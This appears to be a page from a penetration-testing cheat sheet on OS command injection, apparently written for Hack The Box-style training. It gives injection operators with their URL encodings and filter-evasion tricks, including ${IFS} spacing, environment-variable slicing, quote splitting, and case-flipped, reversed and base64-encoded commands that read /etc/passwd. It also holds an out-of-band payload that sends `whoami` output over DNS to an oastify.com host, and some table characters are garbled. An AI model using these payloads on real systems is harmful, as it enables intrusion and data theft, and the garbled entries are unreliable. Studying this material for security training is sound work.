Command Injection

Injection Operator

Injection Character

URL-Encoded Character

Executed Command

Semicolon

;

%3b

Both

New Line

\

%0a

Both

Background

&

%26

Both (second output generally shown first)

Pipe

<<<`

%7c

AND

&&

%26%26

Both (only if first succeeds)

Sub-Shell

````

%60%60

Both (Linux-only)

Sub-Shell

$()

%24%28%29

Both (Linux-only)

tabulador

\

%09

Linux-only

space

${IFS}

Linux-only

If the error message displayed a different page, with information like our IP and our request, this may indicate that it was denied by a WAF

Environment Variables

Linux

${IFS}

Commonly use to evade space

Linux

${PATH:0:1}

/

Linux

${LS_COLORS:10:1}

;

Windows

%HOMEPATH:~6,-11%

/

PowerShell

$env:HOMEPATH[0]

/

Bypassing Blacklisted Commands

#Linux
Intrusionz3r0@htb[/htb]$ w'h'o'am'i21y4d
Intrusionz3r0@htb[/htb]$ w"h"o"am"i
Intrusionz3r0@htb[/htb]$ who$@ami
Intrusionz3r0@htb[/htb]$ w\\ho\\am\\i
Intrusionz3r0@htb[/htb]$ {cat,/etc/passwd}

#Windows
C:\\htb> who^ami

Case manipulation

Linux is case-sensitive hance we have to get a bit creative and find a command that turns the command into an all-lowercase word.

#Windows
PS C:\\htb> WhOaMi
#Linux
Intrusionz3r0@htb[/htb]$ $(tr "[A-Z]" "[a-z]"<<<"cAt") /etc/passwd
Intrusionz3r0@htb[/htb]$ $(a="printENv";printf %s "${a,,}")

#Example
$(tr%09"[A-Z]"%09"[a-z]"<<<"cAt")${IFS}${PATH:0:1}etc${PATH:0:1}passwd

Reversing commands

#Get the word in reverse
Intrusionz3r0@htb[/htb]$ echo 'whoami' | rev
PS C:\\htb> "whoami"[-1..-20] -join ''
Output: imaohw

#Execute command
Intrusionz3r0@htb[/htb]$ $(rev<<<'imaohw')
PS C:\\htb> iex "$('imaohw'[-1..-20] -join '')"
Output: Intrusionz3r0

Encode Commands

Intrusionz3r0@htb[/htb]$ echo -n 'cat /etc/passwd | grep 33' | base64
output: Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw=

Intrusionz3r0@htb[/htb]$ bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
output: www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin

Intrusionz3r0@htb[/htb]$ echo -n whoami | iconv -f utf-8 -t utf-16le | base64
PS C:\\htb> [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('whoami'))
Output: dwBoAG8AYQBtAGkA

PS C:\\htb> iex "$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"

Blind OS command injection with out-of-band data exfiltration

& nslookup `whoami`929y6u9dkdbxdod9zzkjvxf7vy1pplda.oastify.com #

Miscelaneous commands

Injection Type

Operators

SQL Injection

' , ; -- /* */

Command Injection

; &&

LDAP Injection

* ( ) & `

XPath Injection

' or and not substring concat count

OS Command Injection

; & `

Code Injection

' ; -- /* */ $() ${} #{} %{} ^

Directory Traversal/File Path Traversal

../ ..\\\\ %00

Object Injection

; & `

XQuery Injection

' ; -- /* */

Shellcode Injection

\\x \\u %u %n

Header Injection

\ \\r\ \ %0d %0a %09

Tools

https://github.com/Bashfuscator/Bashfuscator

https://github.com/danielbohannon/Invoke-DOSfuscation

PreviousFile Upload Attacks NextInsecure Direct Object Reference (IDOR)

Last updated 9 months ago